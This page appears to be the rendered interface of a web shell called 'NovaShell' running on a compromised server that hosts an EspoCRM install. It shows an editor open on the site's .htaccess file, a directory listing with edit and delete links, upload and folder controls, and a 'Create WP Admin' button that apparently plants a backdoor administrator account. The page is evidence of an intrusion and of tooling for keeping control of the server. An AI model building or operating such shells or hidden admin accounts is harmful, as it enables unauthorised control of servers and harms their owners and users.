✏️ Edit: .htaccess
<ifModule mod_headers.c> Header always set Access-Control-Allow-Methods "POST, GET, PUT, PATCH, DELETE" </ifModule> DirectoryIndex index.php Options -Indexes <IfModule mod_rewrite.c> RewriteEngine On # Forbid access. Not actual as redirect to `public` is applied. # An extra security measure if redirect not fired. RewriteRule ^/?data/ - [F] RewriteRule ^/?application/ - [F] RewriteRule ^/?custom/ - [F] RewriteRule ^/?vendor/ - [F] RewriteRule /?web\.config - [F] # Forbid `public` dir. RewriteCond %{ENV:REDIRECT_STATUS} !=200 RewriteRule ^/?public/? - [F,L] # Skip redirect for `client` dir. RewriteRule ^client/ - [L] # Store base path. RewriteCond %{REQUEST_URI}::$1 ^(.*?/)(.*)::\2$ RewriteRule ^(.*)$ - [E=BASE:%1] # Add trailing slash. RewriteCond %{DOCUMENT_ROOT}/%{ENV:BASE}/public/$1 -d RewriteRule ^(.*?[^/])$ %{REQUEST_URI}/ [L,R=301,NE] # Rewrite to `public` dir. RewriteRule ^((?!public/).*)$ %{ENV:BASE}/public/$1 [L,NC] RewriteRule .* - [E=HTTP_ESPO_CGI_AUTH:%{HTTP:Authorization}] </IfModule> # BEGIN cPanel-generated php ini directives, do not edit # Manual editing of this file may result in unexpected behavior. # To make changes to this file, use the cPanel MultiPHP INI Editor (Home >> Software >> MultiPHP INI Editor) # For more information, read our documentation (https://go.cpanel.net/EA4ModifyINI) <IfModule php8_module> php_flag display_errors Off php_value max_execution_time 180 php_value max_input_time 180 php_value max_input_vars 1000 php_value memory_limit 384M php_value post_max_size 64M php_value session.gc_maxlifetime 1440 php_value session.save_path "/var/cpanel/php/sessions/ea-php82" php_value upload_max_filesize 64M php_flag zlib.output_compression Off </IfModule> <IfModule lsapi_module> php_flag display_errors Off php_value max_execution_time 180 php_value max_input_time 180 php_value max_input_vars 1000 php_value memory_limit 384M php_value post_max_size 64M php_value session.gc_maxlifetime 1440 php_value session.save_path "/var/cpanel/php/sessions/ea-php82" php_value upload_max_filesize 64M php_flag zlib.output_compression Off </IfModule> # END cPanel-generated php ini directives, do not edit
💾 Save
NovaShell
🛸 NovaShell — Cyber Yellow Mode
📂 Path:
home
/
csender
/
crm.akuwait.me
/
👤 Create WP Admin
Upload
📁
Create Folder
📄
.htaccess
[✏]
[x]
📄
.user.ini
[✏]
[x]
📁
.well-known
[x]
📄
EspoCRM-9.1.7.zip
[✏]
[x]
📄
LICENSE.txt
[✏]
[x]
📁
application
[x]
📁
bin
[x]
📄
bootstrap.php
[✏]
[x]
📁
cgi-bin
[x]
📄
clear_cache.php
[✏]
[x]
📁
client
[x]
📄
command.php
[✏]
[x]
📄
cron.php
[✏]
[x]
📁
custom
[x]
📄
daemon.php
[✏]
[x]
📁
data
[x]
📄
extension.php
[✏]
[x]
📁
html
[x]
📄
index.php
[✏]
[x]
📁
install
[x]
📄
php.ini
[✏]
[x]
📄
preload.php
[✏]
[x]
📁
public
[x]
📄
rebuild.php
[✏]
[x]
📄
upgrade.php
[✏]
[x]
📁
vendor
[x]
📄
websocket.php
[✏]
[x]